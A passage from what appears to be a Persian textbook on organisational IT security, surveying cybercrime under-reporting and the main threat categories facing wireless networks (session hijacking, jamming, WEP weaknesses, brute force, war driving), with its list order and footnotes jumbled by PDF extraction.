‫‪ ۱۴۸‬ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﻧﻤﺎﻳﺎﻧﮕﺮ ﺟﻬﺘﮕﻴﺮﻱ ﺳﺎﻻﻧﻪ ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﺳﺖ‪.‬‬
‫‪ ۱۴۹‬ﺍﻳﻦ ﻧﺘﺎﻳﺞ ﺩﺭ ﮔﺰﺍﺭﺷﻲ ﺍﺯ ﻣﺆﺳﺴﺔ ‪Celent Communications‬‬
‫ﺩﺭ ﺳﺎﻝ ‪ ۲۰۰۱‬ﻣﻨﺘﺸﺮ ﺷﺪ ﻭ ﺩﺭ ﺁﻥ ﺍﺯ ﺩﺍﺩﻩﻫﺎﻱ ‪ FTC‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﺪﻩ‬
‫ﺍﺳﺖ‪.‬‬
‫‪150 http://www.infosecuritymag.com/articles/‬‬
‫‪october01/images/survey.pdf‬‬
‫‪ ۱۵۱‬ﻧﻤﺎﻳﻨﺪﺓ ﻭﻳﮋﺓ ﺁﻧﺰﻣﺎﻥ ﺩﺭ ﺳـﺮﻭﻳﺲ ﻣﺨﻔـﻲ ﺟـﺮﺍﺋﻢ ﻣـﺎﻟﻲ‪James ،‬‬
‫‪ ،Savage‬ﮔﻔﺘــﻪ‪" :‬ﺍﻳــﻦ ﺁﻣــﺎﺭ ﺣﻜﺎﻳــﺖ ﺍﺯ ﺍﺷــﻜﺎﻻﺕ ﺟــﺪﻱ ﺩﺭ‬
‫ﺯﻳﺮﺳﺎﺧﺘﻬﺎﻱ ﺣﻴﺎﺗﻲ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻌﻨـﻲ ﺁﻥ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺟﺎﻣﻌـﺔ‬
‫ﺗﺠﺎﺭﻱ ﺗﻤﺎﻳﻞ ﺩﺍﺭﺩ ﺑﭙﺬﻳﺮﺩ ﻛﻪ ﺍﺯ ﺍﻳﻦ ﻧﻈـﺮ ﺁﺳـﻴﺐ ﺩﻳـﺪﻩ "‪ .‬ﺍﻭ ﻣﻌﺘﻘـﺪ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﺁﻣﺎﺭ ﺗﻨﻬﺎ ﺑﻴﺎﻧﮕﺮ ﻳﻚ ﻗﺴﻤﺖ ﺟﺰﺋﻲ ﺍﺯ ﻭﺍﻗﻌﻴﺖ ﺁﺳـﻴﺒﻬﺎﻱ‬
‫ﻭﺍﺭﺩﻩ ﺑﻪ ﺟﺎﻣﻌﺔ ﺗﺠﺎﺭﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻣﻲﺑﺎﺷﺪ‪ ۳) .‬ﺍﻛﺘﺒﺮ ‪(۲۰۰۳‬‬
‫‪ ۱۵۲‬ﻧﻤﺎﻳﻨﺪﺓ ﻣﺨﺼﻮﺹ ‪ ،Cornelius Tate ،CERT‬ﺑﻪ ﺍﻳـﻦ ﺗﻤﺎﻳـﻞ‬
‫ﺑﻪ ﮔﺮﻳﺰ ﺍﺯ ﮔﺰﺍﺭﺵﻛﺮﺩﻥ ﺭﺧﺪﺍﺩﻫﺎ ﺍﻳﻨﮕﻮﻧﻪ ﺍﺷﺎﺭﻩ ﻣﻲﻛﻨﺪ‪" :‬ﻓﻜﺮ ﻣﻲﻛﻨﻢ‬
‫ﻧﮕﺮﺍﻧﻲ ﺍﺯ ﻟﻜﻪﺩﺍﺭ ﺷﺪﻥ ﻭﺟﻬﺔ ﻋﻤﻮﻣﻲ ﺧﻮﺩ‪ ،‬ﺍﺯ ﮔﺰﺍﺭﺵ ﺁﺳـﻴﺒﻬﺎ‬
‫ﻭ ﺿﺮﺭﻫﺎﻱ ﻭﺍﺭﺩﻩ ﺑﻴﻤﻨﺎﻙ ﻫﺴﺘﻨﺪ؛ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﻣﺎﻧﺪﻥ‬
‫ﺭﺍ ﺗﺮﺟﻴﺢ ﻣﻲﺩﻫﻨﺪ‪ .‬ﺍﮔﺮ ﻣﺸﺨﺺ ﺷﻮﺩ ﻛﻪ ﻳﻚ ﺑﻨﮕﺎﻩ ﺍﻗﺘـﺼﺎﺩﻱ‬
‫ﻫﺪﻑ ﻛﻼﻫﺒﺮﺩﺍﺭﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ‪ ،‬ﻣﺸﺘﺮﻳﺎﻥ ﻣﻤﻜﻦ ﺍﺳﺖ‬
‫ﺍﻋﺘﻤـﺎﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺯ ﺩﺳــﺖ ﺑﺪﻫﻨــﺪ ﻭ ﺍﺯ ﺁﻥ ﭘــﺲ ﻣﺎﻳــﻞ ﻧﺒﺎﺷــﻨﺪ‬
‫ﺍﻃﻼﻋﺎﺗﺸﺎﻥ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺁﻥ ﺑﻨﮕـﺎﻩ ﺫﺧﻴـﺮﻩ ﺷـﻮﺩ‪ .‬ﺿـﺮﻭﺭﻱ‬
‫ﺍﺳﺖ ﻛﻪ ﺍﺭﺍﺋﻪﺩﻫﻨﺪﮔﺎﻥ ﺧﺪﻣﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﺧـﻮﺩ ﺭﺍ‬
‫ﺑﻪ ﻧﺤﻮﻱ ﻛﻨﺘﺮﻝ ﻛﻨﻨﺪ ﻛﻪ ﺿـﺎﻣﻦ ﺍﻣﻨﻴـﺖ ﺁﻧﻬـﺎ ﺑﺎﺷـﺪ‪ .‬ﺭﺳـﺎﻧﺔ‬
‫ﺑﻲﺳﻴﻢ ‪ -‬ﻛﻪ ﺩﺭ ﺗﻤﺎﻡ ﺟﻬﺎﻥ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺍﺳـﺖ ‪ -‬ﺭﺳـﺎﻧﺔ‬
‫ﺍﻣﻨﻲ ﻧﻴﺴﺖ‪ .‬ﺷﺘﺎﺏ ﭼﺸﻤﮕﻴﺮ ﻛﺸﻮﺭﻫﺎ ﺟﻬﺖ ﺳﺎﺯﮔﺎﺭﻱ ﺑﺎ ﺑـﺴﺘﺮ‬
‫ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺳﺮﮔﺮﺩﺍﻧﻲ ﺑﺰﺭﮔﻲ ﺍﻳﺠﺎﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫ﺝ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ‬
‫ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺑـﻪ ﺳـﻪ ﺷـﻜﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ‬
‫ﻣﻲﺑﺎﺷﻨﺪ‪ :‬ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻣﺤﻠﻲ ﻛﻪ ﺍﺯ ﭘﺮﻭﺗﻜﻞ ‪802.11b‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ؛ ﺷﺒﻜﻪﻫﺎﻱ ‪) CDMA/TDMA/GSM‬ﺗﻠﻔـﻦ‬
‫ﻫﻤﺮﺍﻩ ﻭ ‪ (PCS‬ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ ﻭ ‪PDA‬ﻫـﺎ؛ ﻭ‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﺎﻳﻜﺮﻭ ﻭﻳﻮ ﭘﺮﻗﺪﺭﺕ ﻛﻪ ﺩﺭ ﺷﺮﻛﺘﻬﺎﻱ ﺗﻠﻔﻦ ﺟﻬـﺖ‬
‫ﺗﺒﺎﺩﻝ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﻣﺴﺎﻓﺘﻬﺎﻱ ﻃﻮﻻﻧﻲ ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﻧﺪ‪ .‬ﺑـﺎ ﺍﻳﻨﻜـﻪ‬
‫ﻫﺮ ﺳﻪ ﻣﻮﺭﺩ ﻓﻮﻕ ﺩﺭ ﺳﺮﺍﺳﺮ ﺩﻧﻴﺎ ﻣﻌﻤﻮﻝ ﻫـﺴﺘﻨﺪ‪ ،‬ﺍﻣـﺎ ﻫﻤﮕـﻲ‬
‫ﻳﻚ ﻧﻘﻄﻪﺿﻌﻒ ﺍﺳﺎﺳﻲ ﺍﻣﻨﻴﺘﻲ ﺩﺍﺭﻧﺪ ﻭ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻓﺮﻛﺎﻧﺲ‬
‫ﺭﺍﺩﻳﻮﻳﻲ )‪ (RF‬ﺑﺮﺍﻱ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻳﻦ ﻣـﺴﺌﻠﻪ‬
‫ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻓﺸﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﻧﺘﻘﺎﻟﻲ ﺑﻴﺎﻧﺠﺎﻣﺪ‪.‬‬
‫ﺷﺒﻜﻪ ﻫﺎﻱ ﺑﻲﺳﻴﻢ ﺑﺼﻮﺭﺕ ﺍﻧﻔﺠـﺎﺭﻱ ﮔـﺴﺘﺮﺵ ﭘﻴـﺪﺍ ﻛﺮﺩﻧـﺪ‪.‬‬
‫ﻱ ﻣﺪﺍﻭﻡ ﺍﺗـﺼﺎﻻﺕ ﺑﺎﻋـﺚ‬
‫ﻲ ﻧﺼﺐ ﻭ ﺑﺮﻗﺮﺍﺭ ﹺ‬
‫ﻫﺰﻳﻨﺔ ﻧﺎﭼﻴﺰ‪ ،‬ﺳﺎﺩﮔ ﹺ‬
‫ﮔﺴﺘﺮﺵ ﺳﺮﻳﻊ ﺁﻧﻬﺎ ‪ -‬ﺑﺨﺼﻮﺹ ﺩﺭ ﻣﺆﺳﺴﺎﺕ ﺧﺪﻣﺎﺕ ﻣﺎﻟﻲ ‪-‬‬
‫ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺩﺭ ﻭﺍﻗﻊ ﮔﻤﺎﻥ ﻣﻲﺭﻓﺖ ﻛـﻪ ﺷـﺒﻜﻪﻫـﺎﻱ ﺑـﻲﺳـﻴﻢ‬
‫ﻫﻤﺎﻥ ﻛﺎﺭﺑﺮﺩ ﺷﺒﻜﻪﻫـﺎﻱ ﺳـﻨﺘﻲ ﺭﺍ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻨﺪ ﺍﻣـﺎ ﺑـﺪﻭﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺎﺑﻞ‪ .‬ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﺷﺒﻜﻪﻫـﺎ ﺑـﺪﻟﻴﻞ ﺳـﻬﻮﻟﺖ ﻛـﺎﺭ‬
‫ﻛــﺎﺭﺑﺮﺍﻥ ﺍﺳــﺖ ﻭ ﺩﺭﺣــﺎﻝ ﺣﺎﺿــﺮ ﺩﺭ ﺍﻳــﺎﻻﺕ ﻣﺘﺤــﺪﻩ ﺗﺤــﺖ‬
‫ﺿﺮﺭﻫﺎﻱ ﻣﺎﻟﻲ ﺑﻴﺶ ﺍﺯ ﻣﻘﺪﺍﺭﻱ ﺍﺳﺖ ﻛﻪ ﮔﺰﺍﺭﺵ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺮ ﺍﺳـﺎﺱ‬
‫ﺗﺠﺮﺑﺔ ﻣﻦ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﺎﻳﻞ ﻧﻴﺴﺘﻨﺪ ﺿﺮﺭﻫﺎﻱ ﻧﺎﺷﻲ ﺍﺯ‬
‫ﻣﻮﺭﺩ ﻧﻔﻮﺫ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺧﻮﺩ ﺭﺍ ﮔﺰﺍﺭﺵ ﻛﻨﻨﺪ‪ .‬ﺑﻨﻈﺮ ﻣﻦ ﺳﺎﻝ ﺑـﻪ ﺳـﺎﻝ‬
‫ﻣﻲﺗﻮﺍﻥ ﺍﻓـﺰﺍﻳﺶ ﺯﻳـﺎﺩﻱ ﺩﺭ ﺯﻳـﺎﻥ ﺷـﺮﻛﺘﻬﺎ ﺍﺯ ﺁﺳـﻴﺒﻬﺎﻱ ﺍﻳﻨﭽﻨﻴﻨـﻲ‬
‫ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﺷﺮﻛﺘﻬﺎ ﺑﻴﺸﺘﺮ ﺑﻪ ﺍﻳﻦ ﻧﺘﻴﺠﻪ ﺭﺳﻴﺪﻩﺍﻧﺪ ﻛـﻪ ﻫـﺮ‬
‫ﻛﺲ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺪﻑ ﻳﻚ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﺑﮕﻴـﺮﺩ‪ ،‬ﻭ ﻗﺮﺑـﺎﻧﻲ ﺷـﺪﻥ ﺩﺭ‬
‫ﺣﻤﻼﺕ ﺑﺘﺪﺭﻳﺞ ﻣﻮﺭﺩ ﻗﺒﻮﻝ ﻭﺍﻗﻊ ﺷﺪﻩ ﻭ ﺩﻳﮕﺮ ﺍﻧﺘﺸﺎﺭ ﺍﺧﺒﺎﺭ ﻣﺮﺑﻮﻁ ﺑـﻪ‬
‫ﺁﻥ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﮔﺬﺷﺘﻪ ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺭﻓﺘﻦ ﺍﻃﻤﻴﻨﺎﻥ ﻋﻤﻮﻣﻲ ﻧﻤﻲﺷﻮﺩ‪".‬‬
‫‪١٨٩‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ‬
‫ﺩﺍﺷﺘﻦ ﺍﺑﺰﺍﺭ ﻣﻨﺎﺳﺐ‪ ،‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺩﺭ ﻣﺤـﺪﻭﺩﻩ ﺍﺭﺳـﺎﻝ‬
‫ﺑﺴﺘﻪ ﻫﺎ ﺑﺎﺷﺪ‪ ،‬ﻗﺎﺩﺭ ﺑﻪ ﺩﺭﻳﺎﻓﺖ ﺁﻧﻬﺎ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ‪ .‬ﻭﺳـﺎﻳﻞ‬
‫ﺗﻘﻮﻳﺖ ﺳﻴﮕﻨﺎﻝ ﻭ ﮔﺴﺘﺮﺵ ﺍﻳﻦ ﻣﺤﺪﻭﺩﻩ ﻧﻴـﺰ ﺑـﻪ ﻭﻓـﻮﺭ‬
‫ﻣﻬﻴﺎﺳﺖ؛ ﻭ ﻟﺬﺍ ﻧﺎﺣﻴﻪﺍﻱ ﻛـﻪ ﺗـﺼﺎﺣﺐ ﺗﺮﺍﻓﻴـﻚ ﺩﺭ ﺁﻥ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ‪ ،‬ﻭﺳﻴﻊ ﻭ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺁﻥ ﻣﺸﻜﻞ ﻣﻲﺑﺎﺷﺪ‪.‬‬
‫ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ‪ IEEE 802.11‬ﻭ ﺩﺭ ﺍﺭﻭﭘﺎ ﺗﺤـﺖ ﺍﺳـﺘﺎﻧﺪﺍﺭ ‪GSM‬‬
‫ﺍﺭﺍﺋﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻫﻨﮕﺎﻡ ﻃﺮﺍﺣﻲ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳـﻴﻢ‪ ،‬ﻧﮕﺮﺍﻧﻴﻬـﺎﻱ‬
‫ﻣﻬﻢ ﺍﻣﻨﻴﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺁﻧﻬﺎ ﺗﻮﺟﻪ ﺷﻮﺩ‪.‬‬
‫ﻫﻔﺖ ﺩﺳﺘﻪ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺍﻭﻟﻴﻪ ﺩﺭ ﻣﻮﺭﺩ ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ‬
‫‪١٥٣‬‬
‫ﻗﺎﺑﻞ ﺫﻛﺮ ﺍﺳﺖ‪:‬‬
‫‪.۲‬‬
‫ﺳﺮﻗﺖ ﺟﻠﺴﻪ‪ :١٥٦‬ﻛﻪ ﺑﻪ "‪"man in the middle‬‬
‫ﻧﻴﺰ ﻣﻌﺮﻭﻑ ﺍﺳﺖ‪ ،‬ﺑﺮ ﺍﺳﺎﺱ ﺍﻳﻦ ﺍﻳﺪﻩ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﻛﻪ ﺩﺭ‬
‫ﺳﻴﺴﺘﻢ ﺗﻠﻔﻨﻬﺎﻱ ﺑﻲﺳﻴﻢ‪ ،‬ﺗﻠﻔـﻦ ﻫﻮﻳـﺖ ﺧـﻮﺩ ﺭﺍ ﺑـﺮﺍﻱ‬
‫ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺗﺼﺪﻳﻖ ﻣﻲﻛﻨـﺪ‪ ،‬ﺍﻣـﺎ ﺍﻳـﺴﺘﮕﺎﻩ ﺍﻳﻨﻜـﺎﺭ ﺭﺍ‬
‫ﺑﺮﺍﻱ ﺗﻠﻔﻦ ﺍﻧﺠﺎﻡ ﻧﻤﻲﺩﻫﺪ؛ ﭘﺲ ﻣﻲﺗـﻮﺍﻥ ﻳـﻚ ﺟﻠـﺴﺔ‬
‫ﺑﻲﺳﻴﻢ ﻣﻴﺎﻥ ﺗﻠﻔﻦ ﻭ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺭﺍ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺗﻠﻔﻦ‬
‫ﺑﺘﻮﺍﻧﺪ ﺑﻪ ﻣﻮﺿﻮﻉ ﭘﻲ ﺑﺒﺮﺩ ﺳﺮﻗﺖ ﻛـﺮﺩ ﻭ ﺑـﺮﺍﻱ ﺍﻳﻨﻜـﺎﺭ‬
‫ﻛﺎﻓﻲ ﺍﺳﺖ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﺛﺎﺑﺖ ﺷﺒﻴﻪﺳﺎﺯﻱ ﺷﻮﺩ‪.‬‬
‫‪.۳‬‬
‫ﭘﺎﺭﺍﺯﻳﺖ ﺩﺍﺩﻥ‪ :‬ﺍﻳﻦ ﺣﻤﻠﻪ ﺍﺯ ﺍﻧﻮﺍﻉ ﺣﻤـﻼﺕ ﺗﺨﺮﻳـﺐ‬
‫ﺳﺮﻭﻳﺲ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺁﻥ ﻧﻔﻮﺫﮔﺮ ﺑﺎ ﺩﺍﺩﻩﭘﺮﺍﻛﻨﻲ ﻭ ﭘﺨﺶ‬
‫ﻱ ﺷﺒﻜﺔ ﺷﻤﺎ ﺳﻌﻲ ﻣﻲﻛﻨـﺪ‬
‫ﺲ ﻛﺎﺭ ﹺ‬
‫ﻋﻤﻮﻣﻲ‪ ١٥٧‬ﺩﺭ ﻓﺮﻛﺎﻧ ﹺ‬
‫ﺩﺭ ﻃﻴــﻒ ﻓﺮﻛــﺎﻧﺲ ﺭﺍﺩﻳــﻮﻳﻲ ﺷــﺒﻜﺔ ﺑــﻲﺳــﻴﻢ ﺍﻳﺠــﺎﺩ‬
‫ﺳﺮﺭﻳﺰ‪ ١٥٨‬ﻛﻨﺪ‪.‬‬
‫‪.۴‬‬
‫ﺣﻤﻼﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ‪ :١٥٩‬ﺷﺒﻜﺔ ﺑـﻲﺳـﻴﻢ ﻣﺒﺘﻨـﻲ ﺑـﺮ‬
‫‪ IEEE 802.11‬ﺍﺯ ﺍﻟﮕـــﻮﺭﻳﺘﻢ ‪ ١٦٠WEP‬ﺑـــﺮﺍﻱ‬
‫ﺭﻣﺰﮔــﺬﺍﺭﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﻣــﻲﻛﻨــﺪ‪ .‬ﺭﻭﺵ ﺭﻣــﺰﮔــﺬﺍﺭﻱ ﻭ‬
‫ﺑﺮﺩﺍﺭﻫﺎﻱ ﻣﻘـﺪﺍﺭ ﺍﻭﻟﻴـﺔ ﺍﻳـﻦ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ﺑـﺴﻴﺎﺭ ﺿـﻌﻴﻒ‬
‫ﻫﺴﺘﻨﺪ ﻭ ﺗﺎﻛﻨﻮﻥ ﺑﺎﺭﻫﺎ ﺷﻜﺴﺘﻪ ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫‪.۵‬‬
‫ﺗﺼﺎﺣﺐ ﺗﺮﺍﻓﻴﻚ ﻭ ﺍﻧﺠﺎﻡ ﺩﻳﺪﻩﺑﺎﻧﻲ‪ :‬ﺑﺮﺩ ﺗﻘﺮﻳﺒﻲ‬
‫ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳـﻲ ﺳـﻴﺎﺭ ﺩﺭ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ ‪ 802.11b‬ﺣـﺪﻭﺩ‬
‫‪ ۳۰۰‬ﻓﻮﺕ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎﺳﺖ ﻛﻪ ﻫﺮ ﻓـﺮﺩﻱ ﺑـﺎ‬
‫‪ ۱۵۳‬ﺍﻳﻦ ﺩﺳﺘﻪﺑﻨﺪﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻳﻜـﻲ ﺍﺯ ﺍﻋـﻀﺎﻱ ﻣﺮﻛـﺰ ﺗﺤﻠﻴـﻞ ‪CERT‬‬
‫ﺍﺳﺖ‪.‬‬
‫‪Insertion Attacks‬‬
‫‪Mobile Access Point‬‬
‫‪Session Hijacking‬‬
‫‪Broadcasting‬‬
‫‪Flooding‬‬
‫‪Encryption‬‬
‫‪Wired Equivalent Privacy‬‬
‫‪154‬‬
‫‪155‬‬
‫‪156‬‬
‫‪157‬‬
‫‪158‬‬
‫‪159‬‬
‫‪160‬‬
‫‪.۷‬‬
‫ﺗﻨﻈﻴﻤﺎﺕ ﻧﺎﺩﻗﻴﻖ‪ :‬ﻫﺮﮔﻮﻧﻪ ﺍﺑﺰﺍﺭ‪ ،‬ﺧﺪﻣﺎﺕ‪ ،‬ﻳـﺎ ﺑﺮﻧﺎﻣـﺔ‬
‫ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺑﻄﻮﺭ ﺻﺤﻴﺢ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻧﺸﺪﻩ ﺑﺎﺷـﺪ‪ ،‬ﻛـﻞ‬
‫ﺷﺒﻜﻪ ﺭﺍ ﻣﻮﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ‪ .‬ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ‬
‫ﻭ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺑـﻲ ﺳـﻴﻢ‪ ،‬ﺑﻄـﻮﺭ ﭘـﻴﺶﻓـﺮﺽ‬
‫ﺑﮕﻮﻧﻪﺍﻱ ﺗﻨﻈﻴﻢ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﻫﺮﮔﻮﻧﻪ ﺩﺭﺧﻮﺍﺳﺖ ﺧـﺪﻣﺎﺕ‬
‫ﻳﺎ ﺩﺳﺘﺮﺳﻲ ﺭﺍ ﻣﻲ ﭘﺬﻳﺮﻧﺪ‪ .‬ﺍﻳﻦ ﺑﻪ ﺁﻥ ﻣﻌﻨﺎ ﺍﺳﺖ ﻛﻪ ﻫـﺮ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺳﻴﺎﺭ ﺩﻟﺨﻮﺍﻩ ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺩﺭﺧﻮﺍﺳـﺖ‬
‫ﺟﻠﺴﺔ ‪ telnet‬ﻳﺎ ‪ ftp‬ﻧﻤﻮﺩﻩ ﻭ ﭘﺎﺳﺦ ﺁﻧﺮﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ‪.‬‬
‫‪.۸‬‬
‫ﺣﻤــﻼﺕ ‪ :Brute Force‬ﺍﻏﻠــﺐ ﻧﻘــﺎﻁ ﺩﺳﺘﺮﺳــﻲ‬
‫ﺑﻲﺳﻴﻢ‪ ،‬ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﻳﺎ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺸﺘﺮﻙ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﺍﺑﺰﺍﺭﻫﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺷﺒﻜﻪﻫﺎﻱ‬
‫ﻼ ﺑـﺮ‬
‫ﺑﻲﺳـﻴﻢ ﺭﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺣﻤـﻼﺕ ‪) brute force‬ﻣـﺜ ﹰ‬
‫ﺍﺳﺎﺱ ﻳﻚ ﻓﺮﻫﻨﮓ ﻟﻐﺖ( ﻧﺎﺍﻣﻦ ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬
‫‪War Driving‬‬
‫ﺟﺎﺳﻮﺳﻲ ﺻﻨﻌﺘﻲ ﻭ ﺟﺮﺍﺋﻢ ﺍﺩﺍﺭﻱ ﺑﺎ ﭘﻴﺸﺮﻓﺖ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﺟﺪﻳـﺪ‬
‫ﺑﻪ ﺑﺎﻻﺗﺮﻳﻦ ﺣﺪ ﺧـﻮﺩ ﺭﺳـﻴﺪﻩﺍﻧـﺪ‪ War dialing .‬ﺑـﻪ ﻣﻌﻨـﺎﻱ‬
‫ﺗﻤــﺎﺱ ﺑــﺎ ﺗﻤــﺎﻡ ﺷــﻤﺎﺭﻩ ﺗﻠﻔﻨﻬــﺎﻱ ﺳــﺎﺯﻣﺎﻥ ﻭ ﻳــﺎﻓﺘﻦ ﺷــﻤﺎﺭﺓ‬
‫ﻣﻮﺩﻡﻫﺎﻱ ﺁﻥ‪ ،‬ﺟﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑﻪ ‪ war driving‬ﺩﺍﺩﻩ ﺍﺳﺖ‪ .‬ﺍﻳـﻦ‬
‫ﻣﻔﻬﻮﻡ ﺟﺪﻳﺪ ﻳﻌﻨﻲ ﺟﺴﺘﺠﻮ ﺑـﺮﺍﻱ ﻳـﺎﻓﺘﻦ ﺷـﺒﻜﻪﻫـﺎﻱ ﻣﺤﻠـﻲ‬
‫ﺑﻲﺳﻴﻢ ﻣﺆﺳﺴﺎﺕ ﺍﻗﺘﺼﺎﺩﻱ‪ ،‬ﻭ ﺿﺒﻂ ﺗﺮﺍﻓﻴـﻚ ﺷـﺒﻜﺔ ﺁﻧﻬـﺎ ﺑـﺎ‬
‫ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤﻞ‪ .‬ﺑﻨﺎ ﺑﻪ ﮔﻔﺘـﻪ ﺩﻳـﻮ ﺗﻮﻣـﺎﺱ‪ ١٦١‬ﺑـﺎﺯﺭﺱ ﺍﺭﺷـﺪ‬
‫ﺑﺨﺶ ﺟﺮﺍﺋﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ war driving ،FBI‬ﭘﺪﻳﺪﻩﺍﻱ ﺩﺭﺣـﺎﻝ‬
‫‪161 Dave Thomas‬‬
‫ﺑﺨﺶ ﺳﻮﻡ‬
‫‪.۱‬‬
‫ﺣﻤﻼﺕ ﺩﺭﺝ‪ :١٥٤‬ﻧﻔﻮﺫﮔﺮ ﺳﻌﻲ ﻣﻲﻛﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ‬
‫ﻧﻘﻄﻪ ﺩﺳﺘﺮﺳﻲ ﺳﻴﺎﺭ‪ ١٥٥‬ﻧﺎﺍﻣﻦ‪ ،‬ﺑﻪ ﺷﺒﻜﺔ ﺷﻤﺎ "ﺩﺍﺩﻩ" ﻭﺍﺭﺩ‬
‫ﻛﻨﺪ‪.‬‬
‫‪.۶‬‬
